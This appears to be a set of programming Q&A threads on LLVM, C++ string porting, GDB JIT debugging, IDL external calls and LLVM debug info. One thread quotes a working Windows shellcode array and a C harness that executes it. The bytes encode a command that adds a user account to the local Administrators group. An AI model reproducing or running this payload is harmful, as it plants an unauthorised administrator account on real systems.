I'm trying to find a way to set the assembly syntax that LLVM outputs (for x86 in particular). Following the Compiling to Object Code section of the Kaleidoscope tutorial, I'm outputting assembly files with
TargetMachine->addPassesToEmitFile(pass, dest, nullptr, llvm::CGFT_AssemblyFile))
But there's no option to set the output syntax.
llc has the command line option --x86-asm-syntax with which you can set the output assembly syntax (for x86), so I'm sure there must be a way to do it.
So is there a way this can be done through LLVM's C++ API?
Here's a few things I found out by reading the LLVM source:
The output assembly syntax is controlled by the AssemblyDialect member in llvm::MCAsmInfo. For x86 the derived classes of llvm::MCAsmInfo can be found in X86MCAsmInfo.h and X86MCAsmInfo.cpp.
The member AssemblyDialect is initialized to the value of AsmWriterFlavor, which is set by the command line option x86-asm-syntax.
As far as I could tell AssemblyDialect isn't referenced anywhere else in the code base, so the only way to set it is by the x86-asm-syntax flag. For that you can use llvm::cl::ParseCommandLineOptions. Minimal example for setting the assembly syntax to intel:
#include <cassert>
#include <llvm/Support/CommandLine.h>
void set_asm_syntax_to_intel()
{
char const *args[] = { "some-exe-name", "--x86-asm-syntax=intel" };
auto const res = llvm::cl::ParseCommandLineOptions(std::size(args), args);
assert(res);
}
Related
The following codes got my curiosity. I always look, search, and study about the exploit so called "Buffer overflow". I want to know how the code was generated. How and why the code is running?
char shellcode[] = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
"\x34\xaf\x01\xc6\x45\x81\x3e\x57\x69\x6e\x45\x75\xf2\x8b\x7a"
"\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf"
"\xfc\x01\xc7\x68\x4b\x33\x6e\x01\x68\x20\x42\x72\x6f\x68\x2f"
"\x41\x44\x44\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69"
"\x6e\x69\x73\x68\x20\x41\x64\x6d\x68\x72\x6f\x75\x70\x68\x63"
"\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44"
"\x44\x20\x26\x68\x6e\x20\x2f\x41\x68\x72\x6f\x4b\x33\x68\x33"
"\x6e\x20\x42\x68\x42\x72\x6f\x4b\x68\x73\x65\x72\x20\x68\x65"
"\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63"
"\x6d\x64\x2e\x89\xe5\xfe\x4d\x53\x31\xc0\x50\x55\xff\xd7";
int main(int argc, char **argv){
int (*f)();
f = (int (*)())shellcode;(int)(*f)();
}
Thanks a lot fella's. ^_^
A simple way to generate such a code would be to write the desired functionality in C. Then compile it (not link) using say gcc as your compiler as
gcc -c shellcode.c
This will generate an object file shellcode.o . Now you can see the assembled code using objdump
odjdump -D shellcode.o
Now you can see the bytes corresponding to the instructions in your function.
Please remember though this will work only if your shellcode doesn't call any other function or doesn't reference any globals or strings. That is because the linker has yet not been invoked. If you want all the functionality, I will suggest you generate a shared binary (.so on *NIX and dll on Windows) while exporting the required function. Then you can find the start point of the function and copy bytes from there. You will also have to copy the bytes of all other functions and globals. You will also have to make sure that the shared library is compiled as a position independent library.
Also as mentioned above this code generated is specific to the target and won't work as is on other platforms.
Machine code instructions have been entered directly into the C program as data, then called with a function pointer. If the system allows this, the assembly can take any action allowed to the program, including launching other programs.
The code is specific to the particular processor it is targetted at.
I am trying to find all places in a large and old code base where certain constructors or functions are called. Specifically, these are certain constructors and member functions in the std::string class (that is, basic_string<char>). For example, suppose there is a line of code:
std::string foo(fiddle->faddle(k, 9).snark);
In this example, it is not obvious looking at this that snark may be a char *, which is what I'm interested in.
Attempts To Solve This So Far
I've looked into some of the dump features of gcc, and generated some of them, but I haven't been able to find any that tell me that the given line of code will generate a call to the string constructor taking a const char *. I've also compiled some code with -s to save the generated equivalent assembly code. But this suffers from two things: the function names are "mangled," so it's impossible to know what is being called in C++ terms; and there are no line numbers of any sort, so even finding the equivalent place in the source file would be tough.
Motivation and Background
In my project, we're porting a large, old code base from HP-UX (and their aCC C++ compiler) to RedHat Linux and gcc/g++ v.4.8.5. The HP tool chain allowed one to initialize a string with a NULL pointer, treating it as an empty string. The Gnu tools' generated code fails with some flavor of a null dereference error. So we need to find all of the potential cases of this, and remedy them. (For example, by adding code to check for NULL and using a pointer to a "" string instead.)
So if anyone out there has had to deal with the base problem and can offer other suggestions, those, too, would be welcomed.
Have you considered using static analysis?
Clang has one called clang analyzer that is extensible.
You can write a custom plugin that checks for this particular behavior by implementing a clang ast visitor that looks for string variable declarations and checks for setting it to null.
There is a manual for that here.
See also: https://github.com/facebook/facebook-clang-plugins/blob/master/analyzer/DanglingDelegateFactFinder.cpp
First I'd create a header like this:
#include <string>
class dbg_string : public std::string {
public:
using std::string::string;
dbg_string(const char*) = delete;
};
#define string dbg_string
Then modify your makefile and add "-include dbg_string.h" to cflags to force include on each source file without modification.
You could also check how is NULL defined on your platform and add specific overload for it (eg. dbg_string(int)).
You can try CppDepend and its CQLinq a powerful code query language to detect where some contructors/methods/fields/types are used.
from m in Methods where m.IsUsing ("CClassView.CClassView()") select new { m, m.NbLinesOfCode }
I read the JIT Interface chapter and faced the problem: how to write a simpliest example for simpliest possible code (preferably in C++ and at least for x86-64 platform)? Say, I want to debug the following code (namely, code_.data() function):
#include "eallocator.hpp"
#include <iostream>
#include <vector>
#include <cstdlib>
int main()
{
std::vector< std::uint8_t, eallocator< std::uint8_t > > code_;
code_.push_back(0b11011001u); code_.push_back(0b11101011u); // fldpi
code_.push_back(0b11000011u); // ret
double result_;
__asm("call *%1"
: "=&t"(result_)
: "r"(code_.data())
:
);
std::cout << result_ << std::endl;
return EXIT_SUCCESS;
}
What (minimally) I should to do to use the interface? Particularly, I want to be able to provide some pseudocode (arbitrary text in memory) as "source" (with corresponding lines info) if it possible.
How to instrument the above code (or something similar), while remaining terse.
#include "eallocator.hpp" should use the approaches from this for Windows or from this for Linux.
If I understand you correctly, what you're trying to do is to dynamically emit some executable code into memory and set up GDB to be able to debug it, is that correct?
What makes this task quite difficult to express in a "minimal" example is that GDB actually expects to find a whole ELF object in memory, not just a lump of code. GDB's registration interfaces need ELF symbol tables to examine in order to figure out which symbols exist in the emitted code and where they reside.
Your best bet to do this without unreasonable effort is to look at LLVM. The Debugging JIT-ed Code with GDB section in the documentation describes how to do this with MCJIT, with a full example at the bottom - going from some simple C code, JITing it to memory with LLVM MCJIT and attaching GDB to it. Moreover, since the LLVM MCJIT framework is involved you get full debug info there, up to the C level!
To be honest, that documentation section has not been updated in a while, but it should work. Let me know if it doesn't - I'll look into fixing things and updating it.
I hope this helps.
There is an example in their tests which should help
https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;a=blob;f=gdb/testsuite/gdb.base/jit-main.c
I'm trying to run a c++ script from IDL using the CALL_EXTERNAL function. I've been able to get it to work without arguments, but when I try to add an arg, such as a single IDL LONG INT, IDL crashes. with the error:
% CALL_EXTERNAL: Error loading sharable executable.
Symbol: main, File = /home/inspired/workspace/TestCode/main.
so
/home/inspired/workspace/TestCode/main.so: wrong ELF class:
ELFCLASS64
% Execution halted at: TEST_EXTERNAL 7
/home/inspired/IDLWorkspace/Analyze Data/test_external.pro
% $MAIN$
The test code I'm using is as follows.
The C++ code:
#include <iostream>
int main(int argc, char *argv[]) {
int temp = (int) strtod(argv[1], NULL);
std:cout<<temp;
return temp;
}
The IDL code:
pro test_external
c= call_external('/home/inspired/workspace/TestCode/main.so','main', long(2), /AUTO_GLUE)
print,c
end
This code is of course practice code, but if I can't get this to work, then there's no way I'll be able to pass a mixture of arrays, and values.
I am aware that IDL passes everything by reference unless stated otherwise. So I've tried both treating the passed argument as a pointer in the C++ code, and setting the /ALL_VALUE keyword to pass the arg as a value. Neither works resulting in the same error as above. I've read about "glue functions" but I have not been able to find a guide to making them (despite every source indicating that it's 'easy for most programmers'" >.>
Anyway, my options are as follows, and if you can help me with any, I'd be eternally grateful:
Get this CALL_EXTERNAL function to work
Have the C code grab the data it needs from memory somehow
Rewrite everything in C++ (you don't need to help with this one)
Thanks in advance.
I think you are trying to mix 32-bit and 64-bit code. It looks like you are compiling your code as 64-bit, but you are running 32-bit IDL. To check this, IDL prints it when it launches or you can check manually:
IDL> print, !version.memory_bits
64
I want to get the line number of an instruction (and also of a variable declaration - alloca and global). The instruction is saved in an array of instructions. I have the function:
Constant* metadata::getLineNumber(Instruction* I){
if (MDNode *N = I->getMetadata("dbg")) { // this if is never executed
DILocation Loc(N);
unsigned Line = Loc.getLineNumber();
return ConstantInt::get(Type::getInt32Ty(I->getContext()), Line);
} // else {
// return NULL; }
}
and in my main() I have :
errs()<<"\nLine number is "<<*metadata::getLineNumber(allocas[p]);
the result is NULL since I->getMetadata("dbg") is false.
Is there a possibility to enable dbg flags in LLVM without rebuilding the LLVM framework, like using a flag when compiling the target program or when running my pass (I used -debug) ?
Compiling a program with ā-O3 -gā should give full debug information, but I still have the same result. I am aware of http://llvm.org/docs/SourceLevelDebugging.html , from where I can see that is quite easy to take the source line number from a metadata field.
PS: for Allocas, it seems that I have to use findDbgDeclare method from DbgInfoPrinter.cpp.
Thank you in advance !
LLVM provides debugging information if you specify the -g flag to Clang. You don't need to rebuild LLVM to enable/disable it - any LLVM will do (including a pre-built one from binaries or binary packages).
The problem may be that you're trying to have debug information in highly optimized code (-O3). This is not necessarily possible, since LLVM simply optimizes some code away in such cases and there's not much meaning to debug information. LLVM tries to preserve debug info during optimizations, but it's not an easy task.
Start by generating unoptimized code with debug info (-O0 -g) and write your code/passes to work with that. Then graduate to optimized code, and try to examine what specifically gets lost. If you think that LLVM is being stupid, don't hesitate to open a bug.
Some random tips:
Generate IR from clang (-emit-llvm) and see the debug metadata nodes in it. Then you can run through opt with optimizations and see what remains.
The -debug option to llc and other LLVM tools is quite unrelated to debug info in the source.